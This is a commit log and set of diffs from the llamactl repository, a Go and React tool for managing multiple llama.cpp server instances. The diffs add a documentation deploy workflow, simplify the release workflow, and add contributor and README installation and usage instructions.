134 Commits

SHA1 Message Date
e2f2b721e1 Merge pull request #28 from lordmathis/docs/user-guide
docs: Add mkdocs based user documentation
2025-09-03 23:29:09 +02:00
8c121dd28c Add create instance screenshot and update managing instances documentation 2025-09-03 23:23:55 +02:00
5eada9b6ce Replace main screenshot 2025-09-03 23:09:50 +02:00
ef1a2601fb Update managing-instances.md with new HuggingFace repository and file examples 2025-09-03 23:04:11 +02:00
3013a343f1 Update documentation: remove Web UI guide and adjust navigation links 2025-09-03 22:47:15 +02:00
969b4b14e1 Refactor installation and troubleshooting documentation for clarity and completeness 2025-09-03 21:11:26 +02:00
56756192e3 Fix formatting in configuration.md 2025-09-02 22:05:01 +02:00
131b1b407d Update api-referrence 2025-09-02 22:05:01 +02:00
81a6c14bf6 Update api docs 2025-09-02 22:05:01 +02:00
b08f15c5d0 Remove misleading advanced section 2025-09-02 22:05:01 +02:00
92af14b350 Improve index.md 2025-09-02 22:05:01 +02:00
b51974bbf7 Imrove getting started section 2025-09-02 22:05:01 +02:00
0b264c8015 Fix typos and consistent naming for Llamactl across documentation 2025-09-02 22:05:01 +02:00
bd31c03f4a Create initial documentation structure 2025-09-02 22:05:01 +02:00
7675271370 Merge pull request #27 from lordmathis/feat/separate-backend-options
feat: Separate backend options from common instance options
2025-09-02 22:03:35 +02:00
d697f83b46 Update GetProxy method to use BackendTypeLlamaCpp constant for backend type 2025-09-02 21:56:38 +02:00
712d28ea42 Remove port marking logic from CreateInstance method 2025-09-02 21:56:25 +02:00
0fd3613798 Refactor backend type from LLAMA_SERVER to LLAMA_CPP across components and tests 2025-09-02 21:19:22 +02:00
4f6bb6292e Implement backend configuration options and refactor related components 2025-09-02 21:12:14 +02:00
d9542ba117 Refactor instance management to support backend types and options 2025-09-01 21:59:18 +02:00
9a4dafeee8 Merge pull request #26 from lordmathis/feat/lru-eviction
feat: Implement least recently used instance eviction
2025-08-31 12:44:06 +02:00
9579930a6a Simplify LRU eviction tests 2025-08-31 11:46:16 +02:00
447f441fd0 Move LRU eviction to timeout.go 2025-08-31 11:42:32 +02:00
27012b6de6 Split manager tests into multiple test files 2025-08-31 11:39:44 +02:00
905e685107 Add LRU eviction tests for instance management 2025-08-31 11:30:57 +02:00
d6d4792a0c Skip eviction for instances without a valid idle timeout 2025-08-31 00:59:26 +02:00
da26f607d4 Update README to enhance resource management details and add configuration options for max running instances and LRU eviction 2025-08-31 00:56:35 +02:00
894f3c3213 Refactor StartInstance method to improve max running instances check 2025-08-31 00:14:29 +02:00
c1fa0faf4b Add LastRequestTime method and LRU eviction logic for instance management 2025-08-30 23:59:37 +02:00
4581d67165 Enhance instance management: improve on-demand start handling and add LRU eviction logic 2025-08-30 23:13:08 +02:00
58cb36bd18 Refactor instance management: replace CanStartInstance with IsMaxRunningInstancesReached method 2025-08-30 23:12:58 +02:00
68253be3e8 Add CanStartInstance method to check instance start conditions 2025-08-30 22:47:15 +02:00
a9f1c1a619 Add LRU eviction configuration for instances 2025-08-30 22:26:02 +02:00
8fdebb069c Merge pull request #25 from lordmathis/fix/stopping-deadlock
fix: Server stopping deadlock
2025-08-30 22:12:07 +02:00
fdd46859b9 Add environment variables for development configuration in launch.json 2025-08-30 22:04:52 +02:00
74495f8163 Refactor Shutdown method to improve instance stopping logic and avoid deadlocks 2025-08-30 22:04:43 +02:00
8ec36dd1b7 Merge pull request #24 from lordmathis/feat/max-running-instances
feat: Implement max running instances constraint and refactor instances status
2025-08-28 20:45:27 +02:00
c4ed745ba9 Fix comparison operators in useInstanceHealth hook 2025-08-28 20:43:41 +02:00
9d548e6dda Remove wrong MaxRunningInstancesError type 2025-08-28 20:42:56 +02:00
41d8c41188 Introduce MaxRunningInstancesError type and handle it in StartInstance handler 2025-08-28 20:07:03 +02:00
7d5c68e671 Add launch configuration for Go server in VSCode 2025-08-28 19:19:55 +02:00
e319731239 Remove unnecessary read locks from GetStatus and IsRunning methods 2025-08-28 19:19:28 +02:00
b698c1d0ea Remove locks from SetStatus 2025-08-28 19:08:20 +02:00
227ca7927a Refactor SetStatus method to capture onStatusChange callback reference before unlocking mutex 2025-08-28 18:59:26 +02:00
0b058237fe Enforce maximum running instances limit in StartInstance method 2025-08-27 21:18:38 +02:00
ae37055331 Add onStatusChange callback to instance management for status updates 2025-08-27 20:54:26 +02:00
a8f3a8e0f5 Refactor instance status handling on the frontend 2025-08-27 20:11:21 +02:00
b41ebdc604 Set instance status to Failed when restart conditions are not met 2025-08-27 19:47:36 +02:00
1443746add Refactor instance status management: replace Running boolean with InstanceStatus enum and update related methods 2025-08-27 19:44:38 +02:00
615c2ac54e Add MaxRunningInstances to InstancesConfig and implement IsRunning method 2025-08-27 18:42:34 +02:00
a6e3cb4a9b Merge pull request #23 from lordmathis/feat/start-on-request
feat: On-Demand Instance Start
2025-08-20 16:04:59 +02:00
9181c3d7bc Remove unused import from zodFormUtils.ts 2025-08-20 16:03:09 +02:00
1939b45312 Refactor WaitForHealthy method to use direct health check URL and simplify health check logic 2025-08-20 15:58:08 +02:00
8265a94bf7 Add on-demand start configuration to instance options and basic fields 2025-08-20 14:56:11 +02:00
4bc9362f7a Add default on-demand start settings and timeout configuration to README 2025-08-20 14:41:42 +02:00
ddb54763f6 Add OnDemandStartTimeout configuration and update OpenAIProxy to use it 2025-08-20 14:25:43 +02:00
496ab3aa5d Update README to clarify on-demand instance start feature 2025-08-20 14:22:55 +02:00
287a5e0817 Implement WaitForHealthy method and enhance OpenAIProxy to support on-demand instance start 2025-08-20 14:19:12 +02:00
7b4adfa0cd Add DefaultOnDemandStart configuration and update instance options 2025-08-20 13:50:43 +02:00
651c8b9b2c Merge pull request #22 from lordmathis/feat/timeout
feat: Implement idle instance timeout
2025-08-20 13:34:38 +02:00
7194e1fdd1 Update README to clarify idle timeout management and state persistence features 2025-08-20 13:32:03 +02:00
492c3ff270 Remove redundant timeout tests and improve test coverage for instance timeout validation 2025-08-20 13:25:56 +02:00
00a3cba717 Enhance shutdown handling in InstanceManager with proper synchronization and max instances check 2025-08-19 22:34:48 +02:00
eb1d4ab55f Enhance timeout functionality tests to validate configuration and logic without starting instances 2025-08-19 20:52:59 +02:00
a9e3801eae Refactor logging in checkAllTimeouts 2025-08-19 19:25:15 +02:00
1aaab96cec Add idle timeout configuration to instance options and basic fields 2025-08-19 19:24:54 +02:00
78eda77e44 Enhance timeout handling in InstanceManager with goroutine recovery and shutdown support 2025-08-17 22:49:28 +02:00
d70bb634cd Implement instance tests for timeout 2025-08-17 21:50:16 +02:00
41eaebc927 Add TimeoutCheckInterval to instance configuration in tests 2025-08-17 21:42:52 +02:00
c45fa13206 Initialize last request time on instance start and update timeout handling logic 2025-08-17 21:15:28 +02:00
5e3a28398d Implement periodic timeout checking for instances 2025-08-17 21:10:48 +02:00
c734bcae4a Move UpdateLastRequestTime method to timeout.go and add ShouldTimeout method for idle timeout handling 2025-08-17 20:37:20 +02:00
e4e7a82294 Implement last request time tracking for instance management 2025-08-17 19:44:57 +02:00
ccffbca6b2 Add timeout check interval and update instance configuration 2025-08-17 19:26:21 +02:00
902be409d5 Add IdleTimeout option to CreateInstanceOptions and update JSON handling 2025-08-17 19:06:09 +02:00
eb9599f26a Merge pull request #21 from lordmathis/feat/dark-mode
feat: Implement dark theme and theme switching
2025-08-11 17:56:16 +02:00
ebf8dfdeab Mock window.matchMedia for dark mode functionality in tests 2025-08-11 17:54:04 +02:00
f15c0840c4 Implement dark theme and theme switching 2025-08-11 17:39:56 +02:00
e702bcb694 Create CNAME 2025-08-08 13:41:58 +02:00
4895fbff15 Merge pull request #20 from lordmathis/docs/contributing
docs: Add CONTRIBUTING.md to outline development setup and contribution process
2025-08-07 21:13:01 +02:00
282fe67355 Add CONTRIBUTING.md to outline development setup and contribution process 2025-08-07 21:10:01 +02:00
96a36e1119 Merge pull request #19 from lordmathis/docs/readme-screenshot
docs: Add dashboard screenshot to README
2025-08-07 19:55:15 +02:00
759fc58326 Update README to include dashboard screenshot 2025-08-07 19:51:34 +02:00
afef3d0180 Update import path for API documentation to use apidocs 2025-08-07 19:48:28 +02:00
a87652937f Move swagger documentation to apidoc 2025-08-07 19:48:03 +02:00
7bde12db47 Merge pull request #18 from lordmathis/feat/show-version
feat: Show app version on backend and frontend
2025-08-07 19:11:58 +02:00
e2b64620b5 Expose version endpoint 2025-08-07 19:10:06 +02:00
3ba62af01a Add VITE_APP_VERSION to environment and update SystemInfoDialog to display version 2025-08-07 19:01:31 +02:00
0150429e82 Add commit hash and build time to version output 2025-08-07 18:48:35 +02:00
2ecf096024 Add version flag to display llamactl version 2025-08-07 18:46:49 +02:00
5aed01b68f Merge pull request #17 from lordmathis/fix/forbidden-logs
fix: Refactor log fetching to use instancesApi
2025-08-06 19:12:34 +02:00
3f9caff33b Refactor log fetching to use instancesApi 2025-08-06 19:07:25 +02:00
169254c61a Merge pull request #16 from lordmathis/fix/llama-server-options
fix: Missing or wrong llama server options
2025-08-06 18:51:18 +02:00
8154b8d0ab Fix temp in tests 2025-08-06 18:49:36 +02:00
a26d853ad5 Fix missing or wrong llama server options on frontend 2025-08-06 18:40:05 +02:00
6203b64045 Fix missing or wrong llama server options 2025-08-06 18:31:17 +02:00
8d9c808be1 Merge pull request #14 from lordmathis/docs/readme-updates
docs: Update README.md to improve project description
2025-08-05 21:32:20 +02:00
161cd213c5 Update README.md to enhance project description and installation instructions 2025-08-05 21:20:37 +02:00
d6e84f0527 Merge pull request #13 from lordmathis/fix/decimal-input
fix: Allow decimal input for numeric fields in instance configuration
2025-08-05 20:03:31 +02:00
0846350d41 Fix eslint issues in ZodFormField 2025-08-05 19:21:09 +02:00
dacaca8594 Fix number input handling to allow decimal values 2025-08-05 19:15:12 +02:00
6e3f5cec61 Merge pull request #12 from lordmathis/refactor/pkg-restructure
Pkg restructure
2025-08-04 20:48:18 +02:00
85b3638efb Update ValidateInstanceName to return the validated name and modify tests accordingly 2025-08-04 20:46:15 +02:00
934d1c5aaa Refactor instance management by moving operations to a new file 2025-08-04 20:38:57 +02:00
2abe9c282e Rename config and instance struct to avoid awkward naming 2025-08-04 19:30:50 +02:00
6a7a9a2d09 Split large package into subpackages 2025-08-04 19:23:56 +02:00
a3c44dad1e Merge pull request #11 from lordmathis/feat/state-persistance
feat: Persist instances configs across app restarts
2025-08-02 23:47:35 +02:00
7426008ef9 Use instance directly in DeleteInstance 2025-08-02 23:35:03 +02:00
cf26aa521a Update README.md to enhance API Key authentication section and provide usage examples 2025-08-02 23:15:25 +02:00
d94c922314 Update README.md for data persistence features 2025-08-02 23:02:30 +02:00
3cbd23a6e2 Implement persistence tests 2025-08-02 22:52:50 +02:00
bed172bf73 Implement instance loading and auto-start functionality on manager initialization 2025-08-02 21:39:19 +02:00
d449255bc9 Persist instance state after starting and stopping instances 2025-08-02 21:23:31 +02:00
de89d0673a Implement instance persistence with JSON file storage and deletion 2025-08-02 21:09:16 +02:00
dd6ffa548c Refactor configuration structure to replace DataConfig with instance-specific directories and auto-creation options 2025-08-02 19:10:40 +02:00
7935f19cc1 Add data directory configuration with auto-creation option 2025-08-02 15:33:33 +02:00
f1718198a3 Merge pull request #10 from lordmathis/fix/graceful-shutdown
Implement graceful shutdown
2025-08-01 23:44:58 +02:00
b24d744cad Implement graceful shutdown for the server and add Shutdown method to InstanceManager 2025-08-01 23:41:18 +02:00
fff8b2dbde Merge pull request #9 from lordmathis/docs/add-prebuilt-install-instructions
Update installation instructions in README.md to include prebuilt binaries
2025-08-01 20:23:54 +02:00
b94909dee4 Update installation instructions in README.md to include prebuilt binaries and manual download steps 2025-08-01 20:17:29 +02:00
ae1bf8561f Merge pull request #8 from lordmathis/feat/frontend-api-auth
feat: Add management API key authentication with login dialog
2025-07-31 20:36:32 +02:00
ad117ef6c6 Add AuthProvider to test components 2025-07-31 20:34:33 +02:00
169432260a Refactor health service to use centralized api client 2025-07-31 19:11:55 +02:00
f94a150b07 Refactor modals to dialogs and update related tests for consistency 2025-07-31 19:03:43 +02:00
c038cabaf6 Implement authentication flow with API key support and loading states 2025-07-31 18:59:12 +02:00
89f90697ef Merge pull request #7 from lordmathis/feat/api-key-auth
Feature: Add API key auth for OpenAI compatible endpoints and llamactl management API endpoints on backend
2025-07-30 21:36:40 +02:00
8e8056f071 Update swagger docs 2025-07-30 21:34:46 +02:00
4d06bc487a Update README for api key auth 2025-07-30 21:31:20 +02:00
bedec089ef Implement middleware tests 2025-07-30 21:20:50 +02:00
b3540d5b3e Implement api key auth 2025-07-30 20:15:14 +02:00
72ba008d1e Merge pull request #6 from lordmathis/fix/release-notes-gen
Remove changelog generation step from release workflow
2025-07-28 22:35:00 +02:00
0aa5def9ec Remove changelog generation step from release workflow 2025-07-28 22:32:44 +02:00
79364eca95 Merge pull request #5 from lordmathis/fix/llama-server-cors
Remove llama server cors headers
2025-07-28 22:10:05 +02:00
e1889a65ac Remove llama server cors headers 2025-07-28 22:06:44 +02:00
83 changed files with 7366 additions and 2813 deletions

.github/workflows/docs.yml (vendored, new file, 65 lines)

@@ -0,0 +1,65 @@
name: Build and Deploy Documentation

on:
  push:
    branches: [ main ]
    paths:
      - 'docs/**'
      - 'mkdocs.yml'
      - 'docs-requirements.txt'
      - '.github/workflows/docs.yml'
  pull_request:
    branches: [ main ]
    paths:
      - 'docs/**'
      - 'mkdocs.yml'
      - 'docs-requirements.txt'

permissions:
  contents: read
  pages: write
  id-token: write

concurrency:
  group: "pages"
  cancel-in-progress: false

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 0 # Needed for git-revision-date-localized plugin

      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install dependencies
        run: |
          pip install -r docs-requirements.txt

      - name: Build documentation
        run: |
          mkdocs build --strict

      - name: Upload documentation artifact
        if: github.ref == 'refs/heads/main'
        uses: actions/upload-pages-artifact@v3
        with:
          path: ./site

  deploy:
    if: github.ref == 'refs/heads/main'
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    runs-on: ubuntu-latest
    needs: build
    steps:
      - name: Deploy to GitHub Pages
        id: deployment
        uses: actions/deploy-pages@v4
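A quick way to sanity-check this workflow before pushing is to run the same commands locally; a minimal sketch, assuming the `docs-requirements.txt` and `mkdocs.yml` added in this PR are present at the repo root:

```bash
# Mirror the CI docs build locally
pip install -r docs-requirements.txt
mkdocs build --strict   # same flag as CI: warnings fail the build
mkdocs serve            # optional live preview at http://localhost:8000
```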

.github/workflows/release.yaml

@@ -29,6 +29,8 @@
           npm ci
       - name: Build Web UI
+        env:
+          VITE_APP_VERSION: ${{ github.ref_name }}
         run: |
           cd webui
           npm run build
@@ -108,63 +110,9 @@
             *.zip
           retention-days: 1
-  generate-changelog:
-    name: Generate Changelog
-    runs-on: ubuntu-latest
-    outputs:
-      changelog: ${{ steps.changelog.outputs.changelog }}
-    steps:
-      - name: Checkout repository
-        uses: actions/checkout@v4
-        with:
-          fetch-depth: 0
-      - name: Generate changelog
-        id: changelog
-        run: |
-          # Get the previous tag
-          PREVIOUS_TAG=$(git tag --sort=-version:refname | grep -v "^${{ github.ref_name }}$" | head -n1)
-          if [ -z "$PREVIOUS_TAG" ]; then
-            echo "No previous tag found, generating changelog from first commit"
-            PREVIOUS_TAG=$(git rev-list --max-parents=0 HEAD)
-          fi
-          echo "Generating changelog from $PREVIOUS_TAG to ${{ github.ref_name }}"
-          # Generate changelog
-          CHANGELOG=$(cat << 'EOL'
-          ## What's Changed
-          EOL
-          )
-          # Get commits between tags
-          COMMITS=$(git log --pretty=format:"* %s (%h)" "$PREVIOUS_TAG..${{ github.ref_name }}" --no-merges)
-          if [ -z "$COMMITS" ]; then
-            CHANGELOG="${CHANGELOG}* No changes since previous release"
-          else
-            CHANGELOG="${CHANGELOG}${COMMITS}"
-          fi
-          # Add full changelog link if we have a previous tag and it's not a commit hash
-          if [[ "$PREVIOUS_TAG" =~ ^v[0-9] ]]; then
-            CHANGELOG="${CHANGELOG}
-            **Full Changelog**: https://github.com/${{ github.repository }}/compare/${PREVIOUS_TAG}...${{ github.ref_name }}"
-          fi
-          # Save changelog to output (handle multiline)
-          {
-            echo 'changelog<<EOF'
-            echo "$CHANGELOG"
-            echo EOF
-          } >> $GITHUB_OUTPUT
   release:
     name: Create Release
-    needs: [build, generate-changelog]
+    needs: [build]
     runs-on: ubuntu-latest
     steps:
       - name: Download all artifacts
@@ -184,8 +132,9 @@
         uses: softprops/action-gh-release@v2
         with:
           name: Release ${{ github.ref_name }}
-          body: ${{ needs.generate-changelog.outputs.changelog }}
+          tag_name: ${{ github.ref_name }}
           files: release-assets/*
+          generate_release_notes: true
           draft: false
           prerelease: ${{ contains(github.ref_name, '-') }}
         env:
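With the custom changelog job removed, release notes now come from `generate_release_notes: true` on the release action. A hedged sketch of the release flow, assuming the workflow triggers on pushed version tags (the `prerelease: ${{ contains(github.ref_name, '-') }}` check suggests tag names like `v1.2.3` or `v1.2.3-rc1`):

```bash
# Hypothetical release flow: push a version tag, CI builds assets
git tag v1.2.3
git push origin v1.2.3
# GitHub then auto-generates "What's Changed" notes from merged PRs
```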

.vscode/launch.json (vendored, new file, 19 lines)

@@ -0,0 +1,19 @@
{
    // Use IntelliSense to learn about possible attributes.
    // Hover to view descriptions of existing attributes.
    // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Launch Server",
            "type": "go",
            "request": "launch",
            "mode": "auto",
            "program": "${workspaceFolder}/cmd/server/main.go",
            "env": {
                "GO_ENV": "development",
                "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
            },
        }
    ]
}
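The same development setup can be reproduced outside VS Code; a small sketch using the environment variables from the launch configuration above:

```bash
# Shell equivalent of the "Launch Server" configuration
GO_ENV=development \
LLAMACTL_REQUIRE_MANAGEMENT_AUTH=false \
go run ./cmd/server/main.go
```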

CNAME (new file, 1 line)

@@ -0,0 +1 @@
llamactl.org

CONTRIBUTING.md (new file, 182 lines)

@@ -0,0 +1,182 @@
# Contributing to Llamactl
Thank you for considering contributing to Llamactl! This document outlines the development setup and contribution process.
## Development Setup
### Prerequisites
- Go 1.24 or later
- Node.js 22 or later
- `llama-server` executable (from [llama.cpp](https://github.com/ggml-org/llama.cpp))
### Getting Started
1. **Clone the repository**
```bash
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
```
2. **Install dependencies**
```bash
# Go dependencies
go mod download
# Frontend dependencies
cd webui && npm ci && cd ..
```
3. **Run for development**
```bash
# Start backend server
go run ./cmd/server
```
Server will be available at `http://localhost:8080`
```bash
# In a separate terminal, start frontend dev server
cd webui && npm run dev
```
Development UI will be available at `http://localhost:5173`
4. **Common development commands**
```bash
# Backend
go test ./... -v # Run tests
go test -race ./... -v # Run with race detector
go fmt ./... && go vet ./... # Format and vet code
# Frontend (run from webui/ directory)
npm run test:run # Run tests once
npm run test # Run tests in watch mode
npm run type-check # TypeScript type checking
npm run lint:fix # Lint and fix issues
```
## Before Submitting a Pull Request
### Required Checks
All of the following must pass:
1. **Backend**
```bash
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
```
2. **Frontend**
```bash
cd webui
npm run test:run
npm run type-check
npm run build
```
### API Documentation
If changes affect API endpoints, update Swagger documentation:
```bash
# Install swag if needed
go install github.com/swaggo/swag/cmd/swag@latest
# Update Swagger comments in pkg/server/handlers.go
# Then regenerate docs
swag init -g cmd/server/main.go -o apidocs
```
## Pull Request Guidelines
### Pull Request Titles
Use this format for pull request titles:
- `feat:` for new features
- `fix:` for bug fixes
- `docs:` for documentation changes
- `test:` for test additions or modifications
- `refactor:` for code refactoring
### Submission Process
1. Create a feature branch from `main`
2. Make changes following the coding standards
3. Run all required checks listed above
4. Update documentation if necessary
5. Submit pull request with:
- Clear description of changes
- Reference to any related issues
- Screenshots for UI changes
## Code Style and Testing
### Testing Strategy
- Backend tests use Go's built-in testing framework
- Frontend tests use Vitest and React Testing Library
- Run tests frequently during development
- Add tests for new features and bug fixes
### Go
- Follow standard Go formatting (`go fmt`)
- Use meaningful variable and function names
- Add comments for exported functions and types
- Handle errors appropriately
### TypeScript/React
- Use TypeScript strictly (avoid `any` when possible)
- Follow React hooks best practices
- Use meaningful component and variable names
- Prefer functional components over class components
## Documentation Development
This project uses MkDocs for documentation. When working on documentation:
### Setup Documentation Environment
```bash
# Install documentation dependencies
pip install -r docs-requirements.txt
```
### Development Workflow
```bash
# Serve documentation locally for development
mkdocs serve
```
The documentation will be available at http://localhost:8000
```bash
# Build static documentation site
mkdocs build
```
The built site will be in the `site/` directory.
### Documentation Structure
- `docs/` - Documentation content (Markdown files)
- `mkdocs.yml` - MkDocs configuration
- `docs-requirements.txt` - Python dependencies for documentation
### Adding New Documentation
When adding new documentation:
1. Create Markdown files in the appropriate `docs/` subdirectory
2. Update the navigation in `mkdocs.yml`
3. Test locally with `mkdocs serve`
4. Submit a pull request
### Documentation Deployment
Documentation is automatically built and deployed to GitHub Pages when changes are pushed to the main branch.
## Getting Help
- Check existing [issues](https://github.com/lordmathis/llamactl/issues)
- Review the [README.md](README.md) for usage documentation
- Look at existing code for patterns and conventions
Thank you for contributing to Llamactl!
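The required checks above chain naturally into a single script; a convenience sketch (assumes a POSIX shell, run from the repo root):

```bash
#!/bin/sh -e
# Run all required backend and frontend checks before opening a PR
go test ./... -v
go test -race ./... -v
go fmt ./... && go vet ./...
go build -o llamactl ./cmd/server
cd webui
npm run test:run
npm run type-check
npm run build
```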

README.md (287 lines changed)

@@ -2,225 +2,136 @@
 ![Build and Release](https://github.com/lordmathis/llamactl/actions/workflows/release.yaml/badge.svg) ![Go Tests](https://github.com/lordmathis/llamactl/actions/workflows/go_test.yaml/badge.svg) ![WebUI Tests](https://github.com/lordmathis/llamactl/actions/workflows/webui_test.yaml/badge.svg)
-A control server for managing multiple Llama Server instances with a web-based dashboard.
-## Features
-- **Multi-instance Management**: Create, start, stop, restart, and delete multiple llama-server instances
-- **Web Dashboard**: Modern React-based UI for managing instances
-- **Auto-restart**: Configurable automatic restart on instance failure
-- **Instance Monitoring**: Real-time health checks and status monitoring
-- **Log Management**: View, search, and download instance logs
-- **REST API**: Full API for programmatic control
-- **OpenAI Compatible**: Route requests to instances by instance name
-- **Configuration Management**: Comprehensive llama-server parameter support
-- **System Information**: View llama-server version, devices, and help
-## Prerequisites
-This project requires `llama-server` from llama.cpp to be installed and available in your PATH.
-**Install llama.cpp:**
-Follow the installation instructions at https://github.com/ggml-org/llama.cpp
-## Installation
-### Build Requirements
-- Go 1.24 or later
-- Node.js 22 or later (for building the web UI)
-### Building with Web UI
-```bash
-# Clone the repository
-git clone https://github.com/lordmathis/llamactl.git
-cd llamactl
-# Install Node.js dependencies
-cd webui
-npm ci
-# Build the web UI
-npm run build
-# Return to project root and build
-cd ..
-go build -o llamactl ./cmd/server
-# Run the server
-./llamactl
-```
-## Configuration
-llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
-1. Hardcoded defaults
-2. Configuration file
-3. Environment variables
-### Configuration Files
-Configuration files are searched in the following locations:
-**Linux/macOS:**
-- `./llamactl.yaml` or `./config.yaml` (current directory)
-- `~/.config/llamactl/config.yaml`
-- `/etc/llamactl/config.yaml`
-**Windows:**
-- `./llamactl.yaml` or `./config.yaml` (current directory)
-- `%APPDATA%\llamactl\config.yaml`
-- `%PROGRAMDATA%\llamactl\config.yaml`
-You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable
-### Configuration Options
-#### Server Configuration
-```yaml
-server:
-  host: ""   # Server host to bind to (default: "")
-  port: 8080 # Server port to bind to (default: 8080)
-```
-**Environment Variables:**
-- `LLAMACTL_HOST` - Server host
-- `LLAMACTL_PORT` - Server port
-#### Instance Configuration
-```yaml
-instances:
-  port_range: [8000, 9000]         # Port range for instances
-  log_directory: "/tmp/llamactl"   # Directory for instance logs
-  max_instances: -1                # Maximum instances (-1 = unlimited)
-  llama_executable: "llama-server" # Path to llama-server executable
-  default_auto_restart: true       # Default auto-restart setting
-  default_max_restarts: 3          # Default maximum restart attempts
-  default_restart_delay: 5         # Default restart delay in seconds
-```
-**Environment Variables:**
-- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
-- `LLAMACTL_LOG_DIR` - Log directory path
-- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
-- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
-- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
-- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
-- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
-### Example Configuration
-```yaml
-server:
-  host: "0.0.0.0"
-  port: 8080
-instances:
-  port_range: [8001, 8100]
-  log_directory: "/var/log/llamactl"
-  max_instances: 10
-  llama_executable: "/usr/local/bin/llama-server"
-  default_auto_restart: true
-  default_max_restarts: 5
-  default_restart_delay: 10
-```
+**Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
+## Why llamactl?
+🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
+🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
+🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
+🔐 **API Key Authentication**: Separate keys for management vs inference access
+📊 **Instance Monitoring**: Health checks, auto-restart, log management
+⚡ **Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
+💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
+💾 **State Persistence**: Ensure instances remain intact across server restarts
+![Dashboard Screenshot](docs/images/dashboard.png)
+**Choose llamactl if**: You need authentication, health monitoring, auto-restart, and centralized management of multiple llama-server instances
+**Choose Ollama if**: You want the simplest setup with strong community ecosystem and third-party integrations
+**Choose LM Studio if**: You prefer a polished desktop GUI experience with easy model management
+## Quick Start
+```bash
+# 1. Install llama-server (one-time setup)
+# See: https://github.com/ggml-org/llama.cpp#quick-start
+
+# 2. Download and run llamactl
+LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
+curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-linux-amd64.tar.gz | tar -xz
+sudo mv llamactl /usr/local/bin/
+
+# 3. Start the server
+llamactl
+# Access dashboard at http://localhost:8080
+```
 ## Usage
-### Starting the Server
-```bash
-# Start with default configuration
-./llamactl
-# Start with custom config file
-LLAMACTL_CONFIG_PATH=/path/to/config.yaml ./llamactl
-# Start with environment variables
-LLAMACTL_PORT=9090 LLAMACTL_LOG_DIR=/custom/logs ./llamactl
-```
-### Web Dashboard
-Open your browser and navigate to `http://localhost:8080` to access the web dashboard.
-### API Usage
-The REST API is available at `http://localhost:8080/api/v1`. See the Swagger documentation at `http://localhost:8080/swagger/` for complete API reference.
-#### Create an Instance
-```bash
-curl -X POST http://localhost:8080/api/v1/instances/my-instance \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "/path/to/model.gguf",
-    "gpu_layers": 32,
-    "auto_restart": true
-  }'
-```
-#### List Instances
-```bash
-curl http://localhost:8080/api/v1/instances
-```
-#### Start/Stop Instance
-```bash
-# Start
-curl -X POST http://localhost:8080/api/v1/instances/my-instance/start
-# Stop
-curl -X POST http://localhost:8080/api/v1/instances/my-instance/stop
-```
-### OpenAI Compatible Endpoints
-Route requests to instances by including the instance name as the model parameter:
-```bash
-curl -X POST http://localhost:8080/v1/chat/completions \
-  -H "Content-Type: application/json" \
-  -d '{
-    "model": "my-instance",
-    "messages": [{"role": "user", "content": "Hello!"}]
-  }'
-```
-## Development
-### Running Tests
-```bash
-# Go tests
-go test ./...
-# Web UI tests
-cd webui
-npm test
-```
-### Development Server
-```bash
-# Start Go server in development mode
-go run ./cmd/server
-# Start web UI development server (in another terminal)
-cd webui
-npm run dev
-```
-## API Documentation
-Interactive API documentation is available at `http://localhost:8080/swagger/` when the server is running.
+### Create and manage instances via web dashboard:
+1. Open http://localhost:8080
+2. Click "Create Instance"
+3. Set model path and GPU layers
+4. Start or stop the instance
+### Or use the REST API:
+```bash
+# Create instance
+curl -X POST localhost:8080/api/v1/instances/my-7b-model \
+  -H "Authorization: Bearer your-key" \
+  -d '{"model": "/path/to/model.gguf", "gpu_layers": 32}'
+
+# Use with OpenAI SDK
+curl -X POST localhost:8080/v1/chat/completions \
+  -H "Authorization: Bearer your-key" \
+  -d '{"model": "my-7b-model", "messages": [{"role": "user", "content": "Hello!"}]}'
+```
+## Installation
+### Option 1: Download Binary (Recommended)
+```bash
+# Linux/macOS - Get latest version and download
+LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
+curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
+sudo mv llamactl /usr/local/bin/
+
+# Or download manually from the releases page:
+# https://github.com/lordmathis/llamactl/releases/latest
+# Windows - Download from releases page
+```
+### Option 2: Build from Source
+Requires Go 1.24+ and Node.js 22+
+```bash
+git clone https://github.com/lordmathis/llamactl.git
+cd llamactl
+cd webui && npm ci && npm run build && cd ..
+go build -o llamactl ./cmd/server
+```
+## Prerequisites
+You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
+```bash
+# Quick install methods:
+# Homebrew (macOS)
+brew install llama.cpp
